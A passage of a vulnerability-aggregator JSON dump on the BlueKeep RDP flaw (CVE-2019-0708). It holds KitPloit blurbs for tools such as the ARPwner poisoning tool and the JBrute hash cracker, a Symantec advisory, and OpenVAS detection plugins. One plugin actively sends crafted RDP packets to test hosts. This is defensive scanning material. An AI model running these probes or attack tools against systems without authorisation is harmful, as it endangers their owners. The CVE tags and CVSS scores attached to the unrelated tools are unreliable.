poisoning attacks, with a simple GUI and a plugin system to do filtering of the information gathered. It also has an implementation of sslstrip, and is coded 100% in Python and hosted on GitHub, so you can modify it according to your needs. \n\n \n\n\n[  ](<https://4.bp.blogspot.com/-Sgm2P60vxGY/US4wvZi0VaI/AAAAAAAAAQU/_EFK2MhqGXU/s1600/ARPwner.jpg>)\n\n \n \n\n\nThis tool was released by Nicolas Trippar at BlackHat USA 2012. 
\n\n \n\n\nFor the tool to work you need pypcap, so assuming you are using a Debian derivative OS (like all sane people do) \u2013 you\u2019ll need to do this first: \n\n \n\n\n** _ apt-get install python-pypcap _ **\n\n \n\n\n \n\n\n** You can download ARPwner here: [ ARPwner.zip ](<https://github.com/ntrippar/ARPwner/archive/master.zip>) **\n\nOr read more [ here ](<https://github.com/ntrippar/ARPwner>) . \n\n \n\n", "edition": 10, "modified": "2013-02-27T16:15:33", "published": "2013-02-27T16:15:33", "id": "KITPLOIT:8309365460568193500", "href": "http://www.kitploit.com/2013/02/arpwner-arp-and-dns-poisoning-attack.html", "title": "[ARPwner] ARP and DNS Poisoning Attack Tool", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-10T22:31:48", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "[  ](<https://2.bp.blogspot.com/-WbxXCxBl9Vg/UmXI7ixd3BI/AAAAAAAABHk/YdRCjR0gJ_w/s1600/scr_startuppartol.png>)\n\n \n\n\nYour PC may often run a little slower than usual. Don't worry, it is nothing serious. You\u2019ve probably installed some software that delayed the boot time. \n\n \n\n** SterJo Startup Patrol ** allows you to view those files and disable them. This way you can optimize the Windows startup time, but be careful not to disable some crucial programs you are using. By blocking those unneeded files the system will definitely run faster and smoother. \n\n \n\n\nThe software constantly tracks new or modified startup registry entries and notifies you if any changes appear. \n\n \n\n\nIf any application tries to add a startup registry entry to your system, then the software will display the application with the following information: _ Section, Product Name, Product Description, Company, Version and Process Path _ . \n\n \n\n\nUsing the displayed information the user can disable or delete the unwanted program and prevent it from automatically running. 
\n\n \n\n\n** [ Download SterJo Startup Patrol v.1.3 ](<http://www.sterjosoft.com/startup-patrol.html>) **\n", "edition": 18, "modified": "2013-10-22T00:39:30", "published": "2013-10-22T00:39:30", "id": "KITPLOIT:727243444931520192", "href": "http://www.kitploit.com/2013/10/sterjo-startup-patrol-v13-disable.html", "title": "[SterJo Startup Patrol v.1.3] Disable software that delayed the boot time", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-21T09:55:08", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "Web-Sorrow is a Perl-based tool for misconfiguration, version detection, enumeration, and server information scanning. It's entirely focused on enumeration and collecting information on the target server. Web-Sorrow is a \"safe to run\" program, meaning it is not designed to be an exploit or perform any harmful attacks. \n\n \n \n \n \n[ ** Download Web-Sorrow ** ](<https://code.google.com/p/web-sorrow/downloads/list>)\n", "edition": 8, "modified": "2013-02-25T23:39:04", "published": "2013-02-25T23:39:04", "id": "KITPLOIT:1049860926455958760", "href": "http://www.kitploit.com/2013/02/web-sorrow-tool-for-misconfiguration.html", "title": "[Web-Sorrow] Tool for Misconfiguration, Version Detection, Enumeration, and Server Information Scanning", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-10T14:34:02", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": " \n\n\n[  ](<https://3.bp.blogspot.com/-gR2gSxANep8/UncYIXDsa5I/AAAAAAAABKA/KhRYC9soZOI/s1600/jbrute_brute.JPG>)\n\n \n\n\nJBrute is an open source tool written in Java to audit the security and strength of stored passwords for several open source and commercial apps. It focuses on providing multi-platform support and flexible parameters to cover most of the possible password-auditing scenarios. 
\n\nJava Runtime version 1.7 or higher is required for running JBrute. \n\n \n\n\nSupported algorithms: \n\n * MD5 \n * MD4 \n * SHA-256 \n * SHA-512 \n * MD5CRYPT \n * SHA1 \n * ORACLE-10G \n * ORACLE-11G \n * NTLM \n * LM \n * MSSQL-2000 \n * MSSQL-2005 \n * MSSQL-2012 \n * MYSQL-322 \n * MYSQL-411 \n * POSTGRESQL \n * SYBASE-ASE1502 \n * INFORMIX-1170 \n \n \n\n\n[ ** Download JBrute ** ](<https://sourceforge.net/projects/jbrute/>)\n", "edition": 14, "modified": "2013-11-04T03:47:13", "published": "2013-11-04T03:47:13", "id": "KITPLOIT:3245813529202482542", "href": "http://www.kitploit.com/2013/11/jbrute-open-source-security-tool-to.html", "title": "[JBrute] Open Source Security tool to audit hashed passwords", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-10T14:34:28", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "Retire.js is a command line scanner that helps you identify dependencies with known vulnerabilities in your application. Using the provided Grunt plugin you can easily include Retire.js in your build process. Retire.js also provides a Chrome extension allowing you to detect libraries while surfing your website. \n\n \n\n\nTo detect a given version of a given component, Retire.js uses the filename or URL. If that fails, it will download/open the file and look for specific comments within the file. If that also fails, there is the possibility to use hashes for minified files. And if that fails as well, the Chrome plugin will run code in a sandbox to try to detect the component and version. This last detection mechanism is not available in the command line scanner, as running arbitrary JavaScript files in the Node process could have unwanted consequences. If anybody knows of a good way to sandbox the code on Node, feel free to register an issue or contribute. 
\n\n \n\n\nIt's important to note that even though your site is using a vulnerable library, that does not necessarily mean your site is vulnerable. It depends on whether and how your site exercises the vulnerable code. That said, it's better to be safe than sorry. \n\n \n\n\n[ ** Download Retire.js ** ](<https://github.com/bekk/retire.js>)\n", "edition": 14, "modified": "2013-11-04T03:33:19", "published": "2013-11-04T03:33:19", "id": "KITPLOIT:3397940664053959113", "href": "http://www.kitploit.com/2013/11/retirejs-command-line-scanner-and.html", "title": "[Retire.js] Command line Scanner and Chrome plugin", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2019-05-15T01:19:50", "bulletinFamily": "software", "cvelist": ["CVE-2019-0708"], "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the affected application. 
Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows Server 2003 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows XP \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2019-05-14T00:00:00", "published": "2019-05-14T00:00:00", "id": "SMNTC-108273", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/108273", "type": "symantec", "title": "Microsoft Windows Remote Desktop Services CVE-2019-0708 Remote Code Execution Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2020-06-05T16:27:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0708"], "description": "This host is running Microsoft Windows Remote Desktop Services\n and is prone to the remote code execution vulnerability known as ", "modified": "2020-06-04T00:00:00", "published": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310108611", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108611", "type": "openvas", "title": "Microsoft Windows Remote Desktop Services 'CVE-2019-0708' Remote Code Execution Vulnerability (BlueKeep) - (Remote Active)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108611\");\n script_version(\"2020-06-04T09:02:37+0000\");\n script_cve_id(\"CVE-2019-0708\");\n script_bugtraq_id(108273);\n script_tag(name:\"last_modification\", value:\"2020-06-04 09:02:37 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-07-05 11:44:28 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows Remote Desktop Services 'CVE-2019-0708' Remote Code Execution Vulnerability (BlueKeep) - (Remote Active)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"ms_rdp_detect.nasl\");\n script_require_ports(\"Services/ms-wbt-server\", 3389);\n script_mandatory_keys(\"msrdp/detected\");\n\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/help/4499164\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/help/4499175\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/help/4499149\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/help/4499180\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/help/4500331\");\n script_xref(name:\"URL\", value:\"https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/\");\n script_xref(name:\"URL\", 
value:\"https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc732713(v=ws.11)\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/108273\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/153133/Microsoft-Windows-Remote-Desktop-BlueKeep-Denial-Of-Service.html\");\n script_xref(name:\"URL\", value:\"https://www.malwaretech.com/2019/05/analysis-of-cve-2019-0708-bluekeep.html\");\n script_xref(name:\"URL\", value:\"https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708\");\n\n script_tag(name:\"summary\", value:\"This host is running Microsoft Windows Remote Desktop Services\n and is prone to the remote code execution vulnerability known as 'BlueKeep'.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a specially crafted request to the target systems\n Remote Desktop Service via RDP and checks the response.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists in Remote Desktop Services\n when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests.\n This vulnerability is pre-authentication and requires no user interaction.\n\n For an in-depth analysis and further technical insights and details please see the references.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to execute arbitrary code on the target system.\n An attacker could then install programs, view, change, or delete data, or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7\n\n - Microsoft Windows Server 2008 R2\n\n - Microsoft Windows Server 2008\n\n - Microsoft Windows Server 2003 R2\n\n - Microsoft 
Windows Server 2003\n\n - Microsoft Windows Vista and Microsoft Windows XP (including Embedded)\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\n\n As a workaround enable Network Level Authentication (NLA) on systems running supported\n editions of Windows 7, Windows Server 2008, and Windows Server 2008 R2.\n\n NOTE: After enabling NLA affected systems are still vulnerable to Remote Code Execution (RCE)\n exploitation if the attacker has valid credentials that can be used to successfully authenticate.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"rdp.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"dump.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"bin.inc\");\n\n# nb: Available since r25570 of libs 9.0\nif( ! defined_func( \"rsa_public_encrypt\" ) )\n exit( 0 );\n\nport = get_port_for_service( default:3389, proto:\"ms-wbt-server\" );\n\nif( get_kb_item( \"rdp/\" + port + \"/isxrdp\" ) )\n exit( 0 );\n\nif( ! soc = open_sock_tcp( port, transport:ENCAPS_IP ) ) # nb: Currently don't get a response back after sending the rdp_create_pdu_negotiation_request() request if SSL/TLS is used\n exit( 0 );\n\nreq = rdp_create_pdu_negotiation_request( use_cookie:TRUE );\nres = rdp_send_recv( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_negotiation_request()\" );\nlen = strlen( res );\n\n# nb: Length depends on if a mstshash Cookie was passed.\n# Without a cookie length is 11\n# With a cookie the length might be 11 or 19\n# see https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/13757f8f-66db-4273-9d2c-385c33b1e483\nif( ! 
res || ( len != 11 && len != 19 ) || hexstr( res ) !~ \"^030000\" ) {\n close( soc );\n exit( 0 );\n}\n\nreq = rdp_create_pdu_connect_initial_request();\nres = rdp_send_recv( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_connect_initial_request()\" );\nif( ! res ) {\n close( soc );\n exit( 0 );\n}\n\nsrv_data = rdp_parse_serverdata( data:res, debug:FALSE );\nif( ! srv_data ) {\n close( soc );\n exit( 0 );\n}\n\nreq = rdp_create_pdu_erect_domain_request();\nrdp_send( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_erect_domain_request()\" );\n\nreq = rdp_create_pdu_attach_user_request();\nres = rdp_send_recv( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_attach_user_request()\" );\nif( ! res || strlen( res ) < 11 ) {\n close( soc );\n exit( 0 );\n}\n\nuser1 = substr(res, 9, 11);\n\nforeach id( make_list( 1009, 1003, 1004, 1005, 1006, 1007, 1008 ) ) {\n req = rdp_create_pdu_channel_request( user1:user1, channel_id:id, debug:FALSE );\n rdp_send_recv( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_channel_request()\" );\n}\n\nclient_rand = rdp_create_client_random();\n\nreq = rdp_create_pdu_security_exchange( client_rand:client_rand,\n public_exponent:srv_data[\"public_exponent\"],\n modulus:srv_data[\"modulus\"],\n bitlen:srv_data[\"bitlen\"] );\nrdp_send( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_security_exchange()\" );\n\nclient_info_pkt = rdp_create_pdu_client_info_request();\n\nrc4_keys = rdp_calculate_rc4_keys( client_rand:client_rand, server_rand:srv_data[\"server_random\"], debug:FALSE );\n\nclient_confirm_active = rdp_create_pdu_client_confirm_active_request();\n\nsync = rdp_create_pdu_client_synchronize_request( target_user:1009 );\n\ncoop = rdp_build_pdu_client_control_cooperate();\n\nclient_req_control = rdp_create_pdu_client_control_request();\n\nevent_sync = rdp_create_pdu_client_input_event_sychronize_request();\n\nfont_list = 
rdp_create_pdu_client_font_list_request();\n\n# 0x03 = CHANNEL_FLAG_FIRST | CHANNEL_FLAG_LAST\nx86_payload = rdp_build_virtual_channel_pdu_request( flags:0x03, data:raw_string( 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ) );\nx64_payload = rdp_build_virtual_channel_pdu_request( flags:0x03, data:raw_string( 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ) );\n\n# the whole static data which has to be encrypted\nfull_data = client_info_pkt + client_confirm_active + sync + coop + client_req_control + event_sync + font_list;\nfor( i = 0; i <= 5; i++ ) {\n full_data += x86_payload;\n full_data += x64_payload;\n}\n\nenc_data = rc4_encrypt( key:rc4_keys[\"initial_client_encryptkey_128\"], data:full_data );\n\n# Dissect the encrypted data again\n# TODO: NASL rc4_encrypt currently can't encrypt the data for our purposes so\n# the data needs to be dissected here (see comment in rdp_build_pkt() as well).\nstart = 0;\nend = strlen( client_info_pkt ) - 1;\nenc_client_info_pkt = substr( enc_data, start, end );\nenc_client_info_pkt = rdp_build_pkt( data:client_info_pkt, client_info:TRUE, rdp_sec:TRUE, enc_data:enc_client_info_pkt, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( client_confirm_active ) - 1;\nenc_client_confirm_active = substr( enc_data, start, end );\nenc_client_confirm_active = rdp_build_pkt( data:client_confirm_active, rdp_sec:TRUE, enc_data:enc_client_confirm_active, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( sync ) - 1;\nenc_sync = substr( enc_data, start, end );\nenc_sync = rdp_build_pkt( data:sync, rdp_sec:TRUE, enc_data:enc_sync, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( coop ) - 1;\nenc_coop = substr( enc_data, start, end );\nenc_coop = rdp_build_pkt( data:coop, 
rdp_sec:TRUE, enc_data:enc_coop, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( client_req_control ) - 1;\nenc_client_req_control = substr( enc_data, start, end );\nenc_client_req_control = rdp_build_pkt( data:client_req_control, rdp_sec:TRUE, enc_data:enc_client_req_control, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( event_sync ) - 1;\nenc_event_sync = substr( enc_data, start, end );\nenc_event_sync = rdp_build_pkt( data:event_sync, rdp_sec:TRUE, enc_data:enc_event_sync, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( font_list ) - 1;\nenc_font_list = substr( enc_data, start, end );\nenc_font_list = rdp_build_pkt( data:font_list, rdp_sec:TRUE, enc_data:enc_font_list, hmackey:rc4_keys[\"mac_key\"] );\n\nenc_x86_payload_list = make_list();\nenc_x64_payload_list = make_list();\n\nfor (i=0; i<=5; i++) {\n start = end + 1;\n end = start + strlen( x86_payload ) - 1;\n enc_x86_payload = substr( enc_data, start, end );\n # 0xed03 = Channel 1005\n enc_x86_payload = rdp_build_pkt( data:x86_payload, rdp_sec:TRUE, channel_id:raw_string( 0x03, 0xed ), enc_data:enc_x86_payload, hmackey:rc4_keys[\"mac_key\"] );\n enc_x86_payload_list[i] = enc_x86_payload;\n\n start = end + 1;\n end = start + strlen( x64_payload ) - 1;\n enc_x64_payload = substr( enc_data, start, end );\n # 0xed03 = Channel 1005\n enc_x64_payload = rdp_build_pkt( data:x64_payload, rdp_sec:TRUE, channel_id:raw_string( 0x03, 0xed ), enc_data:enc_x64_payload, hmackey:rc4_keys[\"mac_key\"] );\n enc_x64_payload_list[i] = enc_x64_payload;\n}\n\nres = rdp_send_recv( socket:soc, data:enc_client_info_pkt, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_info_request() / License packet\" );\n# nb: Windows XP sometimes sends a very large license packet. This is likely\n# some form of license error. When it does this it doesn't send a Server\n# Demand packet. If we wait on one we will time out here and error. 
We\n# can still successfully check for vulnerability anyway.\nif( ! res || strlen( res ) <= 34 )\n rdp_recv( socket:soc, debug:FALSE, debug_req_name:\"Server Demand packet\" );\n\n# nb: Keep the code here as is and don't raise the received length or e.g. use rdp_send_recv(). For some unknown reason trying\n# to change such things will cause a false negative against Windows XP systems.\nrdp_send( socket:soc, data:enc_client_confirm_active, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_confirm_active_request()\" );\n\nrdp_send( socket:soc, data:enc_sync + enc_coop, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_synchronize_request() and rdp_build_pdu_client_control_cooperate()\" );\n\nrdp_send( socket:soc, data:enc_client_req_control, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_control_request()\" );\n\nrdp_send( socket:soc, data:enc_event_sync, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_input_event_sychronize_request()\" );\n\nrdp_send( socket:soc, data:enc_font_list, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_font_list_request()\" );\n\n# nb: Receive all data / clear the socket before sending the payloads below.\nfor( i = 0; i <= 5; i++ ) {\n _res = rdp_recv( socket:soc );\n if( ! 
_res )\n recv( socket:soc, length:1024, min:1 );\n}\n\nreport = \"By sending a crafted request the RDP service answered with a 'MCS Disconnect Provider Ultimatum PDU - 2.2.2.3' response which indicates that a RCE attack can be executed.\";\n\nfor( i = 0; i <= 5; i++ ) {\n\n rdp_send( socket:soc, data:enc_x86_payload_list[i], debug:FALSE, debug_req_name:\"x86 payload of rdp_build_virtual_channel_pdu_request()\" );\n rdp_send( socket:soc, data:enc_x64_payload_list[i], debug:FALSE, debug_req_name:\"x64 payload of rdp_build_virtual_channel_pdu_request()\" );\n\n # nb: Don't use rdp_recv() as it might not receive all data due to unexpected RDP packages\n # received where the length calculation from the header doesn't work as expected.\n res = recv( socket:soc, length:2048, min:1 );\n if( res && hexstr( res ) =~ \"^0300000902f0802180$\" ) {\n close( soc );\n security_message( port:port, data:report );\n exit( 0 );\n }\n\n for( j = 0; j<= 3; j++ ) {\n res = recv( socket:soc, length:2048, min:1 );\n if( res && hexstr( res ) =~ \"^0300000902f0802180$\" ) {\n close( soc );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nclose( soc );\nexit( 0 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T12:52:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0708"], "description": "This host is missing a critical security\n update according to Microsoft KB4500331.", "modified": "2019-12-20T00:00:00", "published": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310814894", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814894", "type": "openvas", "title": "Microsoft Windows Remote Desktop Service Remote Code Execution Vulnerability (KB4500331)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is 
free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814894\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2019-0708\");\n script_bugtraq_id(108273);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-17 15:27:29 +0530 (Fri, 17 May 2019)\");\n script_name(\"Microsoft Windows Remote Desktop Service Remote Code Execution Vulnerability (KB4500331)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4500331.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists when an unauthenticated attacker\n connects to the system using RDP and sends specially crafted requests. 
The vulnerability\n is known as 'BlueKeep'.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker to\n execute arbitrary code on the target system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows XP SP3\n\n - Microsoft Windows Server 2003 SP2\n\n - Microsoft Windows XP Professional x64 Edition SP2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the\n references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/help/4500331/windows-update-kb4500331\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"\\drivers\\Termdd.sys\");\nif(!fileVer)\n exit(0);\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n if(version_is_less(version:fileVer , test_version:\"5.1.2600.7701\"))\n {\n report = report_fixed_ver(file_checked:sysPath + \"\\drivers\\Termdd.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 5.1.2600.7701\");\n security_message(data:report);\n exit(0);\n }\n}\n\nelse if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0){\n\n if(version_is_less(version:fileVer , test_version:\"5.2.3790.6787\"))\n {\n report = report_fixed_ver(file_checked:sysPath + \"\\drivers\\Termdd.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 5.2.3790.6787\");\n security_message(data:report);\n exit(0);\n 
}\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:44:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0708"], "description": "Microsoft released a security advisory to disclose a remote code execution vulnerability in Remote Desktop Services.", "modified": "2020-06-06T00:00:00", "published": "2020-06-05T00:00:00", "id": "OPENVAS:1361412562310108794", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108794", "type": "openvas", "title": "Huawei Data Communication: Remote Code Execution Vulnerability in Some Microsoft Windows Systems (huawei-sa-20190529-01-windows)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108794\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2019-0708\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Remote Code Execution Vulnerability in Some Microsoft Windows Systems (huawei-sa-20190529-01-windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"Microsoft released a security advisory to disclose a remote code execution 